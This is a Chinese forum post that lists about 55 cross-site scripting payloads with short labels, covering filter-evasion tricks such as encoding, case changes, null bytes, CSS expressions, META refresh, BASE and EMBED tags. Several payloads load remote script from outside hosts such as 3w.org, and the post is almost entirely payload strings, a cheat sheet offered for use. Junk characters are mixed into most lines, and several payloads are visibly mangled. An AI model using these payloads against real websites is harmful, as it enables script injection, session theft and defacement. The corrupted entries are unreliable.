找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2273|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2016-4-28 10:06:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
(1)普通的XSS JavaScript注入
) G6 _$ Z* l  W; Q1 k: X$ z! P
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>3 L1 `6 R. t* w- ?; H
(99)另类弹框
% ^6 X# e  D* R/ A/ |- y
<q/oncut=alert()>1
& \/ j3 V# m0 U5 ?& F<s/onclick=alert()>b* \: p2 O; s  j3 F$ u* g
<XSS=" onclick="alert(1)//">clickme</SSX=">2 q- s: o) P8 c5 A& g  l
<zzz onclick=alert`1`>clickme</zzz> & ^! D) ^8 M! C- V7 K+ o+ e2 j
<a onclick=alert`1`>clickme</a>
+ o3 t8 f3 \& y) g) h/ u+ T<a=">clickme</a=">
' O2 h4 Z& a5 h! r<a=">clickme</a>
  y& A* p2 c( d' c' N<z=">clickme</z=">
1 g" n- A* X& [" r1 T  s<z onclick=alert`1`>clickme</z>
5 f3 N8 [% H% W5 {
, Q% e) C/ l- U- t: s) g(2)IMG标签XSS使用JavaScript命令9 S, v2 w6 n- X4 r( e
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ s& s0 B( e) F4 i5 ^9 ^0 {: H
! l9 e( j7 D' ~3 A/ @
(3)IMG标签无分号无引号" i) G( w  S% b0 z, s
<IMG SRC=javascript:alert(‘XSS’)>9 I/ u. d) H3 r
1 y! @* K- b4 `+ D! B; p+ y
(4)IMG标签大小写不敏感4 K1 U$ W4 X2 C, \" `. @' M) m
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>& ?1 k5 {7 T3 [8 D/ r' f7 G  u8 E

! |! t( X3 t2 y& n
(5)HTML编码(必须有分号)6 H/ b' ]( m7 _; k7 i
<IMG SRC=javascript:alert(“XSS”)>1 {, T) f) x* F& o0 G) B% w, I# l, P

: g0 Y2 W, L2 o- C0 A
(6)修正缺陷IMG标签0 p* R+ H# d# q  \( H2 h
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
( Z& e# Y) y9 f- C. H% x" f
* Z" ~  B2 K: O
(7)formCharCode标签(计算器)* n2 S. E$ s) b; ^7 r! c5 e' I, R, A
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; r2 M& |- z4 t( {/ k
; W( w4 w% i! `; f: N1 j" U
(8)UTF-8的Unicode编码(计算器)0 K1 a9 |+ `/ t( Z" h$ X
<IMG SRC=jav..省略..S')>
3 p8 Y: c9 N5 T5 ~+ V
; b/ x0 J9 s4 ~
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)7 v% }1 v) |5 e+ B
<IMG SRC=jav..省略..S')>8 @) {+ S- w6 o8 }$ U
; D& z2 l! ~% T2 S1 |- J% w8 y
(10)十六进制编码也是没有分号(计算器)# ~2 i, f* O9 N
<IMG SRC=\'#\'" /span>6 v# _/ T1 }+ e; M, A

- n9 n+ Q( n4 E3 I" t(11)嵌入式标签,将Javascript分开
* `1 l7 y* H  w3 _( R* E<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>8 B: n6 G4 v: M8 A+ e8 |
/ W3 j) G- w% ?. M1 g1 o. h: T, |( N
(12)嵌入式编码标签,将Javascript分开
8 T# g  o/ V6 `' z2 v0 t0 S3 E2 P- |<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>; v9 A' H) s( W2 ^6 e( u4 f6 g
( c/ R+ J; A7 B' O1 w/ u' _
(13)嵌入式换行符
3 O# l) c) m3 i2 c<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
- e& T# Q. x4 C6 |% x: l* x3 C# k4 X, o. u! z+ h
(14)嵌入式回车
  b  x( A8 d6 A- D  M<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>( [" U- i; S  m

9 ~. A0 B2 ]/ @* |2 u! t(15)嵌入式多行注入JavaScript,这是XSS极端的例子) `3 t- f* C9 Z
<IMG SRC=\'#\'" /span>
" K/ f2 }2 z+ T  d$ o% X: D
  n4 O0 W4 R* o! P# N, `+ Z(16)解决限制字符(要求同页面)
+ _  ]; K' Q5 N<script>z=’document.’</script>. g, k* l! a/ L$ P
<script>z=z+’write(“‘</script>
. X# v3 ^! `" r6 X/ K7 i8 [<script>z=z+’<script’</script>
) P% O" J8 S+ c8 j2 M<script>z=z+’ src=ht’</script>
2 u; P. \  T: W" G3 F5 a& e<script>z=z+’tp://ww’</script>3 E- P9 V" U' O$ R/ R4 l
<script>z=z+’w.shell’</script>
1 Q9 M$ h1 y) N<script>z=z+’.net/1.’</script>
* g8 e  O9 c- G<script>z=z+’js></sc’</script>2 |3 \; Z+ @0 Y- I6 s$ T1 y
<script>z=z+’ript>”)’</script>1 O) Q- I, J4 A% N/ U2 }* b
<script>eval_r(z)</script>$ s5 j/ v6 K5 F! [4 Z
3 B( G: y% B; u" H
(17)空字符  Z* q$ I; s: V) x# O
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out% p3 _6 E$ d3 H# r

9 `% |" E, w5 P1 {(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用# t1 ]! q+ u* b4 B
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out: N2 a5 K( ?; ?" w. y

' z6 Y7 c3 @# M# s; `* S- P5 m0 J(19)Spaces和meta前的IMG标签; X7 S# K" R! f( A
<IMG SRC=\'#\'"   javascript:alert(‘XSS’);”>
% Z! a% x; x/ {, _8 B' F" o  D
- V* n6 C/ V  K4 u(20)Non-alpha-non-digit XSS& F: Z4 ?7 p- r
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>: Q$ E5 `. ?2 T/ ?7 X! o7 l
; A2 _9 D* p' t. J0 V  j& H
(21)Non-alpha-non-digit XSS to 2
$ X0 Z: L+ p- b1 _, J<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# ?4 h3 p7 L; }! @/ A! _% g' U; V5 b1 ?& |, K5 n  G. ~! g# B6 G
(22)Non-alpha-non-digit XSS to 3
( T% v$ f% l0 V( R<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
" [! [( e& a1 p8 ~/ ^0 F
: O2 f. D5 {1 w- J) @4 A" W(23)双开括号
5 G, `2 C) b; y: C# e; X; Z1 W5 O<<SCRIPT>alert(“XSS”);//<</SCRIPT>% ?6 |' [- Y2 g# q$ t
& g8 M( J; t2 b/ b, |
(24)无结束脚本标记(仅火狐等浏览器)% X  V6 b0 u+ w+ T- s4 n0 o* Z9 R
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
% V" @( I- G. P8 }8 f
, a9 D( A2 S4 _( z( y0 U* I7 F" H(25)无结束脚本标记2
- N+ _( g  i" z4 l: @<SCRIPT SRC=//3w.org/XSS/xss.js>* W$ j% b' H5 N1 X1 E4 B

: I9 @9 M$ ^3 z$ G& N- U; R+ B0 |(26)半开的HTML/JavaScript XSS
5 l$ E' o$ A) ^' h2 Q$ J<IMG SRC=\'#\'" /span>
1 W3 l; r& y) Q/ l6 F1 P8 ?( R& z, u2 l6 U" d
(27)双开角括号
) j/ }! M" o  B( T8 d* t<iframe src=http://3w.org/XSS.html <6 X; U/ I, f) |% h  Z  Q
4 |! }8 g" P+ V( s2 q* _: n
(28)无单引号 双引号 分号
) u  o& k4 |/ I# S/ ~( U<SCRIPT>a=/XSS/
( B! K3 t* j% G1 e9 a* ialert(a.source)</SCRIPT>
& y& Q0 ^: E, J  q0 P; Y3 e
% F4 }2 i( {6 L7 L; D: `(29)换码过滤的JavaScript0 V# e+ `1 Q: M1 Q
\”;alert(‘XSS’);//
4 E5 h7 o0 y7 ?' N) N1 ?  J, P4 U
9 |& C1 f" K7 P# o1 f, N, ~(30)结束Title标签
1 G3 {, t; n4 |2 F3 X</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
3 i) G' m! K1 n! A5 ]& X" g6 N  W7 M" o' V: N. M% {
(31)Input Image: U- @# o, X9 v& U: Q
<INPUT SRC=\'#\'" /span>
/ s( g9 D4 F! i  N9 z; v
, c, l, T4 J& ?- M. x  ~(32)BODY Image! T2 G7 Q/ `3 y
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>: u1 j( r6 h! L% @5 v! f0 q% G
; t( ?1 e6 N+ I
(33)BODY标签, R# O& }6 \2 K( b( _' ]
<BODY(‘XSS’)>  M2 u5 I4 S0 B2 p1 y) v' r
! t4 l% Z, _5 ~* o5 \% l9 T% }% R
(34)IMG Dynsrc5 c! j% K5 c+ `! A- X& R
<IMG DYNSRC=\'#\'" /span># t6 t' h  o/ X$ H

& ^5 q; F+ Z' h1 K4 r6 D  _7 r4 j(35)IMG Lowsrc
- B" v6 c. [9 J6 q, g9 G; j# E<IMG LOWSRC=\'#\'" /span>
5 B( N& `2 j7 V  A
3 E% z! }5 s# b* Y. y6 a/ D6 [$ }% o(36)BGSOUND$ S" }7 {6 k* f( e* }
<BGSOUND SRC=\'#\'" /span># _$ r' ]( i! I: b% Q8 u

, v+ L& O2 l: R- D4 r(37)STYLE sheet
0 e; ~7 R, _7 h: Z<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 z. U! G* a1 E# |9 u9 e$ d+ ^3 o( }2 ?0 S& x& {7 [
(38)远程样式表3 R" w. I/ }# `( d9 c9 t  Q/ n
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
. P+ K( x* u2 U& L: {3 ^: K2 k" n  G  ~- }* P
(39)List-style-image(列表式)
5 v3 M: F# j5 f5 l* M) {( `<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS6 z* ?' ]4 R! R2 a

: I) t$ _8 H; ^  c5 |(40)IMG VBscript
+ v. v* d, N* A& x3 j5 s<IMG SRC=\'#\'" /STYLE><UL><LI>XSS0 |& U3 k& S& P( q8 J; N  I

: n# c  k: p9 Z  X+ w/ i8 e' {(41)META链接url9 n7 g4 c1 c9 F
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
- L+ A/ ?5 W/ `6 t" ]) E0 b0 C; C; a
  F3 V7 q4 K9 p+ A; ?( ](42)Iframe# o* f4 G4 _: H- Z/ Y
<IFRAME SRC=\'#\'" /IFRAME>  U4 j( {7 z$ L+ k

, }6 j+ s# a2 ?& h, i. H(43)Frame
4 A4 y, |0 b) h+ r! z3 s2 g<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>" y& }' a( I1 I; q

3 z- x1 k" x! {1 o' z$ Z% j(44)Table
( G2 _9 K7 i$ p  {# f# M+ D. R<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 q. |4 m. ]! c7 s0 W
1 M6 C7 J3 C7 `(45)TD# m2 ~2 J3 u0 G+ J) F8 C. @$ d$ k
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ ~' g; A  S! Q0 E4 I7 B: ~+ R9 T0 B  |  Z* v- e. I4 A: U8 \
(46)DIV background-image' y" d' Q; L3 {; J3 D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
, s: p0 w8 R$ W# I: {( e; }5 |: e: Z1 m. |5 s9 J/ a
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 t; Q; U% O, g+ v4 ^( V3 ]/ G. K
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( k, y# |5 x7 V( W
% _- O9 r3 f7 W- T(48)DIV expression
* J1 N" N7 [! R# h* `; s<DIV STYLE=”width: expression_r(alert(‘XSS’));”>  @/ ~% X' d+ j: v7 p

. L9 q# b' [* O8 I9 X2 U9 Y(49)STYLE属性分拆表达
! _4 c; v  g+ ]" P$ R: ]5 m& a: i<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# j1 a/ C4 b6 L% C2 f! l/ u
1 j+ s) `4 d5 x8 U* p4 h(50)匿名STYLE(组成:开角号和一个字母开头)
6 {- x# q+ s3 v9 F<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
8 h$ O. {  E2 z" l3 ~& w5 u$ O. J
1 x' C" q8 b- q# N* ^+ V(51)STYLE background-image
5 [9 A- h# u6 g) Y<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>0 C) A& o. g* S( b# g
) ^) {6 n, Q8 v! h
(52)IMG STYLE方式3 r9 G5 J. c+ z
exppression(alert(“XSS”))’>- u. _$ t: ~/ i3 z8 Z

! r9 _* L) W5 b# q(53)STYLE background
1 ^' D7 L1 S4 d5 X+ u: L. {<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>3 [. {4 q, r3 i' _) o2 [

! }' H. ?% W5 y9 E1 h  L# ](54)BASE
+ z* Y( C1 K/ }<BASE HREF=”javascript:alert(‘XSS’);//”>* d% a9 e) z% B( u& g7 a  q& Z
& R$ J; D4 }! Y& x; A/ D
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS9 g6 {" @/ K2 T4 N5 Y  L
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>

$ {2 J; A8 @2 m2 ]
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表